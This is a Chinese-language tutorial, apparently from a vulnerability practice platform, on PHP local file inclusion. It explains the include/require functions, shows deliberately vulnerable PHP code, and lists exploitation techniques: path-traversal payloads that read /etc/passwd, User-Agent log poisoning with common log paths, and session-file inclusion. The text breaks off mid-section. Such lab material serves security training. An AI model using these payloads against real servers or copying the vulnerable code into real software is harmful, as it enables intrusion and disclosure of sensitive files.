

# 漏洞演练平台之文件包含篇

## 一、文件包含漏洞

严格来说，文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。“代码注入”的典型代表就是文件包含。文件包含漏洞可能出现在 JSP、PHP、ASP 等语言中，原理都是一样的，这里介绍 PHP 文件包含漏洞。

## 二、什么是本地文件包含(LFI)漏洞？

LFI 允许攻击者通过浏览器包含一个服务器上的文件。当一个 WEB 应用程序在没有正确过滤输入数据的情况下，就有可能存在这个漏洞，该漏洞允许攻击者操纵输入数据、注入路径遍历字符、包含 web 服务器的其他文件。

## 三、文件包含原理

如果允许客户端用户输入控制动态包含在服务器端的文件，会导致恶意代码的执行及敏感信息泄露，主要包括本地文件包含和远程文件包含两种形式。

在 PHP 中，有四个用于包含文件的函数，当使用这些函数包含文件时，文件中包含的 PHP 代码会被执行。下面对它们之间的区别进行解释：

`include()`:当使用该函数包含文件时，只有代码执行到 `include()` 函数时才将文件包含进来，发生错误时只给出一个警告，继续向下执行。

`include_once()`:功能和 `include()` 相同，区别在于当重复调用同一文件时，程序只调用一次。

`require()`:1.`require()` 与 `include()` 的区别在于 `require()` 执行如果发生错误，函数会输出错误信息，并终止脚本的运行。2. 使用 `require()` 函数包含文件时，只要程序一执行，立即调用文件，而 `include()` 只有程序执行到该函数时才调用。

`require_once()`:它的功能与 `require()` 相同，区别在于当重复调用同一文件时，程序只调用一次。

## 四、项目设计

本项目设计采用不限制路径和限制路径两种方式，实现简单的本地文件包含漏洞，供使用者熟悉与利用。关键代码如下：

不限制路径：

```
$file = $_GET['file'];
if (is_file($file)){
    include $file;
}
```

限制路径为 /upload :

```
$file = $_GET['file'];
$path = substr($_SERVER['SCRIPT_FILENAME'],0
, strpos($_SERVER['SCRIPT_FILENAME'],'/'));

if(is_file($path.'/upload/'.$file.'.php')){
    include $path.'/'.$file.'.php';
}
```

## 五、利用技巧

### 1. 包含目录文件

?file=test.txt

如果里面的内容是 php, 则内容会被当成 php 执行, 不是 php 则会读取到文件内容 (用来读取/etc/passwd 等等配置文件的敏感信息)

?file=../../../../test.txt

../当前目录, ../上一级目录, 这样的遍历目录来读取文件

例如: ../../../../../../etc/passwd

## 不限制路径的文件包含漏洞

../../../../etc/passwd

包含这个文件

```
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/sbin/nologin systemd-coredump:x:999:998:systemd Core Dumper:/sbin/nologin systemd-timesync:x:998:997:systemd Time Synchronization:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/sbin/nologin dbus:x:81:81:System message bus:/sbin/nologin polkitd:x:997:996:User for polkitd:/sbin/nologin qemu:x:107:107:qemu user:/sbin/nologin rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin chrony:x:996:992:/var/lib/chrony:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/sbin/nologin openvpn:x:995:991:OpenVPN:/etc/openvpn:/sbin/nologin radvd:x:75:75:radvd user:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin geoclue:x:994:989:User for geoclue:/var/lib/geoclue:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin colord:x:993:987:User for colord:/var/lib/colord:/sbin/nologin abrt:x:173:173:/etc/abrt:/sbin/nologin saslauth:x:992:76:Saslauthd user:/run/saslauthd:/sbin/nologin nm-openvpn:x:991:986:Default user for running openvpn
```

### 2. 包含日志文件

无法上传文件的时候, 可以尝试利用 UA 插入 payload 到日志文件, 然后包含容器的日志文件 (错误、访问文件都行), 注意: 选择凌晨包含最好, payload 后面加一个 exit() 退出程序, 以防大日志导致浏览器卡死, 如果包含不成功, 也许是 open\_basedir 限制了目录。

常见几个路径：

`/var/log/apache/access_log`

`/var/www/logs/access_log`

`/var/log/access_log`

### 3. 包含 session 文件

session 文件一般在/tmp 目录下，格式为 `sess_[phpsessid]`，